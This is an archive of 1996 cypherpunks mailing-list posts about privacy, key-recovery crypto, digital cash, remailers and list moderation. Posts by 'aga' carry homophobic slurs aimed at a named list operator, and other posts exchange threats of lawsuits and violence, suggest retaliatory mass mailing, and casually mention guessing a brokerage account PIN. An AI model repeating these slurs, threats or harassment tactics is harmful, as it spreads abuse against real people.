These things CAN happen.  Will they happen?  Odds are low.

BTW, are you operating under your True Name?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 18 Nov 1996 11:57:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611181957.LAA05941@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 8:38 PM 11/17/1996, Huge Cajones Remailer wrote:
>Before we complete your school assignment for you how about letting us 
>all know the due date and the credit value first.
>
>On Sat, 16 Nov 1996, Huge Cajones Remailer wrote:
> 
>> Privacy is a hassle.  Is it worth it?
>> 
>> Which unfortunate situations does privacy prevent?  What are the odds
>> that they will occur?  How much effort will it take to prevent these
>> outcomes?  As a model, use the present and future situation of a
>> typical reader of this list.

Insult is not enlightening.

URL?  Book?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 18 Nov 1996 12:06:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611182000.MAA23957@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 11:13 PM 11/17/1996, Huge Cajones Remailer wrote:
> Examples?

How about the draft?  The privacy protected child has options the
others do not.  Legal risk okay - beats getting shot.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 18 Nov 1996 12:10:09 -0800 (PST)
To: minow@apple.com
Subject: Re: Computer CPU chips with built-in crypto?
In-Reply-To: <v03007805aeb4208db8aa@[17.219.102.27]>
Message-ID: <199611181205.MAA00114@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Martin Minow <minow@apple.com> writes:
> In a note to cypherpunks, Hal Finney comments on the new crypto
> initiative:
> >
> >It's also not clear what the hardware manufacturers get out of this.
> >Their sales overseas have never been blocked.  There has been no demand
> >for custom crypto hardware.  I don't see how they have been harmed by an
> >inability to ship computers with built-in encryption hardware.  Granted
> >there are some possible applications for such systems but I don't see the
> >market demand which would drive this decision.
> >
> 
> I'm not sure if I can answer this but, at last week's SF cypherpunks
> meeting, an Intel engineer asked whether there might be any interest
> in a computer chip with some sort of encryption mechanism built
> into the chip. As I understand it, this chip would process an
> encrypted instruction stream. I.e., it could not execute a program
> unless the "key" for that program was first loaded into the chip.
> 
> An interesting idea: does anyone have more information?

It is a dangerous idea.  I speculated on this on the list some time
ago.  What we don't want is a clipper CPU which is using skipjack to
decrypt the instruction stream at run-time.  It opens up all sorts of
flexibility for GAK, software copyright protection, and means that
people won't be able to see what code they are running on their own
CPU.

I think it would be a negative technology from a cypherpunks
perspective, particularly if the USG has anything to do with it.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 18 Nov 1996 12:23:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
In-Reply-To: <Pine.LNX.3.95.961118101854.21676O-100000@dhp.com>
Message-ID: <199611182006.MAA24108@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: aga <aga@dhp.com>
> 
> Maybe because John Gilmore is a faggot and takes it up
> the ass.  That was the real reason behind the clash.  Dr. Vulis
> just does not like Faggots, and Gilmore has admitted to being queer.

So why did Vulis drag the rest of this mailing list into his disputes?
If this is about homosexuality, wouldn't alt.fag.bashing have been a
more appropriate forum for his insults.  This mailing list is about
cryptography and loosely related political issues.  It seems that
several allegedly gay members of the mailing list have a lot more to
contribute on the subject than you or Vulis.  Perhaps you somehow
disagree, but so what?  In either case you must admit that insults
based on sexual orientation are not relevant to this mailing list.

> The one thing must be said about the Internet is that Faggots are
> not allowed to have any Authority positions, and this John Gilmore
> Faggot violates that rule.

They're not?  Where did you get that?  First of all, what do you
define as an Authority position in a completely decentralized network
like the internet?  Are you talking about being a member of IANA or
working for the internic or something?  In that case there clearly is
no such restriction (in fact, any such restriction would probably
result in serious legal problems for the organization that tried to
set such policy).

> Never trust anybody who does not fuck cunt.

Why not?  Is there something obvious I'm missing?  What does someone's
sexual orientation have to do with his or her trustworthiness?

Can you please explain what your point is, and why you need to make it
on cypherpunks?  I mean if you resent John Gilmore being in a position
of authority because for some reason you think he is gay and that
bothers you, why use a mailing list he controls to spread that
message, as you are giving him control over your communications?  I
think most of the people on this mailing list don't give a shit about
anyone's sexual orientation.  You and Vulis have made your point that
you think certain members are gay.  Apparently most of the remaining
members of the list don't believe you and/or don't care.  What more
are you trying to accomplish?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Nov 1996 10:00:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: BIS_sez
Message-ID: <1.5.4.32.19961118175738.006c97e0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-18-96. FiTi:

   "Electronic money threat to central banks"

      A report issued today by the BIS says that innovations
      such as "electronic purses" or "digital cash" used over
      the Internet could erode central banks' income.
      "However, if issuance of e-money is limited to banks,
      the regulatory framework already in place can be
      extended to cover the new products, but competition and
      innovation might be more limited."

   -----

   http://jya.com/bissez.txt

   BIS_sez







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Mon, 18 Nov 1996 10:20:11 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: NO commo to "Faggot" cypherpunk list
In-Reply-To: <848332398.56610.0@fatmans.demon.co.uk>
Message-ID: <Pine.LNX.3.95.961118131031.6951B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996 paul@fatmans.demon.co.uk wrote:

> Date: Sun, 17 Nov 1996 15:01:52 +0000
> From: paul@fatmans.demon.co.uk
> To: aga <aga@dhp.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly N
> 
>  
> > If you do not send it to me by e-mail, I will never see it.
> > Why are you so paranoid that someone is reading your e-mail?
> > I never do anything criminal, so I could give a shit less if
> > everybody reads all of my fucking mail.
> 
> I was trying hard not to get into this thread as it is basically just 
> one long flamewar that is getting out of control but I have to 
> comment here:
> 
> There need be no reason for paranoia. I don`t call it paranoia, I 
> call it constant vigilance, to demonize it is a statist position and 
> tries to ostricise those who protect their privacy. 
> 
> Whether you do anything criminal or not is not the point. Indeed I 
> would say that 90-95% of encryption usage is for perfectly legal 
> purposes, and only about 0.1% of encrypted material is concerned with 
> unethical acts rather than illegal acts. The point is you should 
> retain the right to protect your privacy. 
> Sure, it`s not illegal to  put forward anarchist arguments in mail today, 
> but do you really want your company boss knowing about it? 

get an anonymous account if you want to do that.

>  I personally don`t work - I`m a student so it doesn`t matter to me, 
> but whether it is right that your employement and political views should 
> affect each other they do, so you should be able to protect yourself 
> with technology...
> 
As I said dude; I no longer respond to any como with the cypherpunks
address in the header.  If you want an answer to your comments,
address your reply to the Freedom-knights list or to me, without
any *punks address in the header.

Any list run by an admitted Faggot is no place where I
will allow an audience.  This is not a reply to your comments.

-aga

> 
>   Datacomms Technologies web authoring and data security
>        Paul Bradley, Paul@fatmans.demon.co.uk
>   Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
>        Http://www.cryptography.home.ml.org/
>       Email for PGP public key, ID: 5BBFAEB1
>      "Don`t forget to mount a scratch monkey"
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 18 Nov 1996 14:29:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: accutrade
Message-ID: <199611182120.NAA10915@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hacking the 9 digit account number and 4 digit PIN will be easier than attacking the OS directly.
Either method though would certainly ring loud bells at Accutrade unless they are infected with 
headinbutt disease.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 18 Nov 1996 11:28:26 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: HP announcement
In-Reply-To: <3.0b28.32.19961118103631.006b5260@ricochet.net>
Message-ID: <3290B876.5142@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> 
> HP has info on its new crypto stuff on the web now:

One of the subheadings in the white paper: "Toward a New Commercial
Order."  Ya gotta love it.

A lot of the security (that is, "security" from the point of view of
nervous Federales) seems to rely on certificates and tokens that are
supposedly spoof-proof (I guess).  Looks to me as if application 
certificates will be rather difficult to protect from being "abused".
It's also not clear to me how they'd prevent my flying to Luxembourg,
getting a Policy token that allows any & all crypto functions, and
then flying my butt back to Singapore for an encryption party.


______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Mon, 18 Nov 1996 13:31:06 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore...
Message-ID: <199611182130.NAA08518@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> Dave Hayes writesL:
> > [For those who's assumptions rule their perception: I am *not* arguing
> > that all speech should be subsidized. I am merely pointing out that
> > the organization that is spending the money to broadcast is
> > controlling the speech, hence it is *not* free speech in terms of
> > freedom or cost.]
> Again, you confuse free speech with free broadcast.

Isn't broadcast a subset of speech, especially in this culture?
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

The penalty for laughing in a courtroom is six months in jail; if it were 
not for this penalty, the jury would never hear the evidence.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Mon, 18 Nov 1996 13:34:46 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fuck You Dumb Cunt
Message-ID: <199611182134.NAA08552@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis writes:
> I'm especially sorry that some of you don't believe in property
> rights.  

I believe in them, alright. It's just that they seem to be at odds
with freedom of speech. 

They are at odds with a lot of other things as well, but that's
a different fla...er...discussion.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

   History is not usually what has happened.
            History is what some people have thought to be significant.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sven <sven@loop.com>
Date: Mon, 18 Nov 1996 13:36:38 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Warfield's audience is terminated
Message-ID: <199611182136.NAA29416@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>I have been advised by my associates that you are a waste of my time.
>My audience for your comments is therefore terminated.

Right on -- that guy came across as a masturbator with the "I'm my own
p0stmastur!1!!1" response and it's probably more effective for both of you
to work separately.

Fuck flames,
Feed trolls.

Sven
|__
   |--> SVEN: a.k.a. Chris Blanc
        Internet consulting/Web design
		
		[ http://www.loop.com/~sven/ ]

Some only sample the dark wine of life's blood...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 18 Nov 1996 13:41:03 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: HP announcement
In-Reply-To: <3.0b28.32.19961118103631.006b5260@ricochet.net>
Message-ID: <Pine.3.89.9611181320.A22847-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


Greg wrote:

> Sounds to me like they want to be able to turn off strong crypto the way
> they can turn off high-detail GPS during politically/militarily sensitive
> events. 

That's my analysis as well. That, and we will see crypto strength based on 
the application. Credit card numbers get 3DES, email gets 40bit RC4.

[...]
> Users
> can decide whether to use key recovery, based on personal needs or domestic
> -- or foreign -- government regulations. 

The decision which type of crypto to use is not solely up to the 
user. If it was, a non-US user could just decide to turn on strong 
crypto. The Policy Token must therefore contain a field indicating GAK is 
"optional" or mandatory.

What does this mean? Policy tickets are served from central Policy
Servers. Foreigners only get servers that will turn GAK on by default. US
users get servers, run by an unspecified agency, that will initially send
tickets with a "GAK optional" value. This value can be changed to "GAK
mandatory" in times of national emergencies, suspected terrorist
activities, suspicious behavior, you know the drill.

Flip a central switch, and all crypto goes from "non-GAK" to "GAK". Which of 
course makes it GAK from the outset.

--Lucky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 18 Nov 1996 12:20:41 -0800 (PST)
To: aga@dhp.com (aga)
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
In-Reply-To: <Pine.LNX.3.95.961118101854.21676O-100000@dhp.com>
Message-ID: <m0vPYmV-0000sZC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


aga enscribed thusly:

> On Sun, 17 Nov 1996, Sven wrote:

> > Date: Sun, 17 Nov 1996 10:34:13 -0800
> > From: Sven <sven@loop.com>
> > To: aga <aga@dhp.com>
> > Cc: cypherpunks@toad.com
> > Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
> > 
> > 
> > >> 	I have a suggestion...  How 'bout if everybody on this list dropped
> > >> a procmail configuration that mailed aga@dhp.com and postmaster@dhp.com
> > >> a copy of every message that originated from aga@dhp.com?  Do you think
> > >> he would start to "get it" then?


> That cocksucker is not dumb enough to try that.  It is him who
> will get terminated after I talk with his postmaster.

	You're the one who is not too bright.  I got you're message to
"my postmaster".  He be me.  :-)  I wasn't too sympathetic (other than
for your postmaster)...

	Want to try complaining to the company president?  :-)

> > Why are these people so uptight?

> > Sven
	:
	: - Mindless drivel deleted...
	:
> -aga

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 18 Nov 1996 10:56:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: [QUADRUPLE]-- Rewards for errors in _Digital Cash_
Message-ID: <v02140b1aaeb63bcddb1e@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I just saw the movie "Ransom" where Mel Gibson gets to be cool
by doubling the reward for the capture of his son's kidnappers.
In that spirit, I'm doubling my reward again. What was once a
reward of $10 for information about a technical error in the
book is now a reward of $40.

Also, I've opened an account with Mark Twain bank so I can pay
the rewards in Digicash. Or, if you prefer First Virtual, I can
handle that as well. Or, if you're old fashioned and want my
signature, you get the proverbial check in the mail.

The details are simple. The first person to report a technical
error in the book gets $40. You're also welcome to make
suggestions for ways to improve the book. I may pay a reward for
these, but I can't make a blanket promise. I'm reaching my
deadline so this offer will only be good until the end of
November,
1996.

So far no one has reported any technical errors. A few have made
suggestions that I've taken. I hope more will continue to offer
suggestions for improving the book because they're a great help
and I will reward them.

Here is the ``fine print'':

1) My decisions on what constitutes an error are final. I could
declare something a ``feature'', not an error. Or I could lump
many errors together and label it ``one''. So if I left out a
page, this could be one error, not 200+ errors in the page
number on all subsequent pages.  But I hope to use this power
benevolently.

2) Technical errors are eligible. Errors in spelling and grammar
aren't. It's just too hard to come up with a logical definition
of correct grammar. Technical errors also involve some amount of
judgement, but I think they are tighter.

3) My decision on who is the ``first'' person to discover an
error is final. I may choose to reward two people who obviously
work independently. I just want to defend against people saying,
"Okay, let's mail him this simulatenously."

4) This offer may be withdrawn at any time. Check my webpage for
details.

5) Copies of the book may be obtained by purchasing them from
1-800-3131277 or from your local bookstore.


Peter Wayner
pcw@access.digex.net
http://www.access.digex.net/~pcw/pcwpage.html
410-433-8275






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Mon, 18 Nov 1996 11:02:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
In-Reply-To: <Pine.SUN.3.91.961118063411.10538D-100000@crl8.crl.com>
Message-ID: <199611181857.NAA23775@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:
> 
> > >> Informally, I don't know anybody who has suffered due to a loss of
> > >> privacy.
> > >
> > >Your circle of associations must be limited.
> > 
> > Examples [of people who have suffered due to loss of privacy]?
> 
[Sandy's list of examples elided for space]
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

And here's a new one from today's (11/18/96) New York Times:

For complete story, see:
http://www.nytimes.com/yr/mo/day/news/national/child-pornographer.html


On Prison Computer, Files to Make Parents Shiver By Nina Bernstein

For two years, the Federal Bureau of Investigation has been looking into
a computer programming and telemarketing business that is run by inmates
at a Minnesota prison after agents seized child pornography files.

  -30-

The story explains how investiagtors found not just child pornography, but 
a list of names, ages, personal details ("latchkey kids," "speech 
difficulties," etc.) of children "most[ly] girls between 3 and 12" 
alphabetized by town and coded by map coordintates.


rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johannes Kroeger <jkroeger@squirrel.owl.de>
Date: Mon, 18 Nov 1996 06:15:54 -0800 (PST)
To: mail2news@anon.lcs.mit.edu
Subject: Squirrel goes Mixmaster-only
Message-ID: <19961118140419.21236.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello remailer users!

I'm sorry, but my ISP complained that the huge mail traffic for
squirrel overloaded their servers.  Effective immediately, my remailer
accepts only Mixmaster packets and is not listed in Raph's type-1
statistics anymore.  The operation of the nym server at weasel.owl.de
is not affected.


Regards,
Johannes

- -- 
Johannes Kroeger		<jkroeger@squirrel.owl.de>
Send me mail with subject "send pgp-key" to get my PGP key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1

iQEVAgUBMpBs1bwPSJ4oQv5pAQF3Agf/UYmh1P7DM0Wqy9Dzoq/e0jZdvcTDHpNH
2MFohAmU1rYn0tKCRW1jUDkG8ULAmfM4HY+aSdKwoihndLL4wTRkhzcl2qePVx6L
69ZEs7EpTLpdiFuTAvIvAD8AInqRZY1WgKII9jk7gccU379gl8nxDZtlIyA89jrG
795R8QWysQs5zfyQ4VtS2s94ZchFJD+Wp5u6fsVhzklsjxwb43EdVZ4/dPUFo7nO
azctBYNpWdJBW2Rf81zQDE2OPPs+2kXcvDXU/cg64gtGVGf+8okysEr2fEqdVkFe
yQsFvpNngaClUSu6xxMIJXiTy3WlbEYXceQE6hUGStq/PkhqKxkqYQ==
=nAT3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 18 Nov 1996 14:30:37 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <199611181953.LAA05242@mailmasher.com>
Message-ID: <Pine.SUN.3.91.961118135025.343B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 18 Nov 1996, someone wrote:

> At 6:55 AM 11/18/1996, Sandy Sandfort wrote:

> >On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:

> >> >> Informally, I don't know anybody who has suffered due to a loss of
> >> >> privacy.
> >> Examples [of people who have suffered due to loss of privacy]?

Note in the following exchange that HC firsts asks for examples
of harm, then when clearly unambiguous examples are given, tries 
to imply that the examples are rare, trivial or (most amazingly)
that the victim did suffer, but must have deserved his/her fate!

> >Phil Zimmermann often tells the story of a woman whose marriage
> >was destroyed by the revelation of a long-past indiscretion. 
> >After her husband divorced her, she committed suicide.
> 
> Deceiving your spouse is not a good reason to protect your privacy.

Really?  What if the spouse is violently abusive?  You might 
want to leave him and NOT be tracked down and killed.
 
> >Any number of celebrities have been stalked, attacked and even
> >killed by obsessed fans who found them through public records.
> 
> Unfortunately most readers of this list do not have this problem.

Unfortunately?  You don't have to be famous to be stalked.  Many
ordinary people are being dogged by former or would-be paramors.
Is it HC's contention that this is only a problem when a 
majority of Cypherpunks suffer from it?
 
> >Every year, children and business executives are kidnapped for
> >ransom.  The proximate cause of these kidnappings is a breach in
> >privacy about the whereabouts and schedules of the victim.  
> 
> Or this problem.

How fatuous.

> >Hitler's gun registration in Germany allowed the Jews to be
> >disarmed.  I'm sure you are aware of the ultimate consequences
> >of that little invasion of privacy.
> 
> Not a bad example, but genocide happens rarely.

They happens all to often.  Is this response supposed to be joke?
 
> Those alert enough to protect their privacy in advance might be alert
> enough to get out in time, anyway.

Yeah, I guess HC is right, the slow ones deserved it.
 
> >The US Post Office co-operated in the identification and 
> >imprisonment of people of Japanese ancestry during the second
> >world war.
> 
> 97,000 victims over a ~100 year period.  Doesn't really show up on the
> scope, sorry.  (Plus downside bad, but few were murdered.)

Yeah, just a few.  Okay by me and HC, I recon.
 
> >The problem with having a whole lot of private information about
> >you floating around in public is not what damage it can do to you
> >now, but rather the problems it potentially could cause in the
> >future.  Just about everyone on this list has been to university.
> >Not long ago, a college education was essentially a death warrant 
> >in Cambodia.  Prior to that, a degree was considered a good thing
> >there.  People saw no reason to hid the fact that they had been
> >in school.  Trouble is, things changed.
> >
> >And the trouble today is that things can change now, too.  Think
> >about the things that you have publicly done or advocated.  Even
> >if they are as legal as church on Sunday NOW, how comfortable 
> >will you be about them if there is extreme right or left takeover
> >in the future?  Start to get the picture?
> 
> These things CAN happen.  Will they happen?  Odds are low.

The odds approach unity over time.
 
> BTW, are you operating under your True Name?

NOYB.  More importantly, since you seem to think privacy isn't
all that important why don't you give us your true name, date of
birth, SS#, mother's maiden name, address where you sleep at 
night, pictures of you (and your family), etc.?  After all, as 
you wrote, the "odds are low" anything will come of it.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 18 Nov 1996 14:54:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: What do our Netscape folks have to say?
In-Reply-To: <Pine.3.89.9611171813.A12245-0100000@netcom14>
Message-ID: <3290E95B.15FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
>
> At 6:44 PM -0800 11/17/96, Lucky Green wrote:
>
>> I have a hard time believing that Netscape caved. As I wrote in July,
>> HP was working on selling our children's birthright to obtain an
>> export license for their product. But Netscape participating in this
>> just doesn't sound right.
>
> Indeed, some comments from the usually-vocal Weinstein brothers would
> be most welcome.

Our position on hardware crypto is that if it has a PKCS#11 interface,
we'll probably support it.  To the best of my knowledge, we aren't
endorsing the HP scheme in particular.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 18 Nov 1996 06:06:26 -0800 (PST)
To: azur@netcom.com
Subject: Re: Cypherpunks, Inc?
Message-ID: <9611181404.AA28876@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: azur@netcom.com, cypherpunks@toad.com
Date: Mon Nov 18 14:00:17 1996
> Now why don't the cypherpunks put together something like the item
> below? In fact, why don't we form some sort of Guild, trademark the term
> cypherpunks (I'll volunteer) and offer cracking and security products
> (like the one below) or services?  A product security endorsement from
> Cypherpunks Inc. could carry a lot of weight :-)

"We", do, check out the cryptocd at www.rpini.com.



- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMpBd4hFhy5sz+bTpAQFqewf/aJ/xx/hxZn1o/nMKJcLjauCpfcZmxX12
aGD2fJw8PncAzmZAnyxP0/ymK21+mdry1wZPsJXLtqrwJqT8nxPqEXXtfh19MHm9
HB1pDo0nYSOWfP7ENq3lNe995FGEvQ6EMiyy/7PxulcY+0T53Q78CTk6GD0KgPxd
rqmfmxvqNuKERzCONhtirkiwkm2NjFT2ytd7H3VTFSUv7wIHGp2dFiiscC2csP2I
XUlVlQ7w6TUGkO498qSY3wB+ZLHMYYkU21rvKgCTz4AZqmTLRWgZar5g3qlug1uS
RA1r/GB3vfa6KuTcOGowt26FvROEsHu3ZSrZzOry8U0LMo2tgIcNtA==
=vtPA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 19 Nov 1996 09:20:55 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
Message-ID: <848424019.97279.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> 
> That is your last warning, Mike.  If you start harasing my postmaster,
> I will have your fucking ass in Federal Court before you can blink.
> 

I on the other hand can kick your ass because I am in the UK and I 
look forward to doing so immensely unless you stop sending shit to 
the list...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Mon, 18 Nov 1996 16:21:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: How to slow the animals ...
In-Reply-To: <328EA802.1B19@gte.net>
Message-ID: <199611190020.QAA17742@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



It seems that there are many technical means to stop abuse from
the resource usage sense:

1.  Prevent non-members from sending mail to the list.  (This may
    be done already, but since I don't know, I cannot say.)

2.  Limit the rate of new subscription requests (perhaps on a per-
    host or per-domain basis.)

3.  Re-order out-going mail (from toad.com) according to size.
    Drop messages from queue if it gets "reordered" too many times.

4.  Truncating long messages.

5.  Re-order out-going mail (from toad.com) according to time of
    last mail (from the originator).  Basically, limit the rate of
    mail from any particular person or host or domain.

6.  Refuse connections from "known host(s) or domain(s) of
    abusers" during "busy" periods.

These are not whole-sale censorship mechanisms, but just abuse-
resistence measures.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 19 Nov 1996 09:21:41 -0800 (PST)
To: Piotr Kunio <piotrk@opnt.optimus.wroc.pl>
Subject: Re:
Message-ID: <848424026.97278.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> unsunscribe


This stego system must be damn slow seeing as they only ever misspell 
it in one of two positions, ie. unsuXscriXe, X any letter.

Still, i`ll assume it was a cunning plan to trick me into telling him 
how to unsubscribe.

To unsubscribe from the cypherpunks mailing list:

Send a message to majordomo@toad.com with the *MESSAGE BODY* reading
exactly as follows:

unsubscribe cypherpunks you@your.domain.com



   

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Mon, 18 Nov 1996 14:06:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: U.S. CIA employee caught spying
Message-ID: <9611182205.AA08339@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



This is on the local DC news;

Harold Nicholson age 46, a CIA employee was arrested for spying today
at Dulles airport. He allegedly has been working for the Russians
for the past 2 years.

He was caught after he failed a series of polys, and bank account 
irregularities had been noticed, as well as suspcious travel.
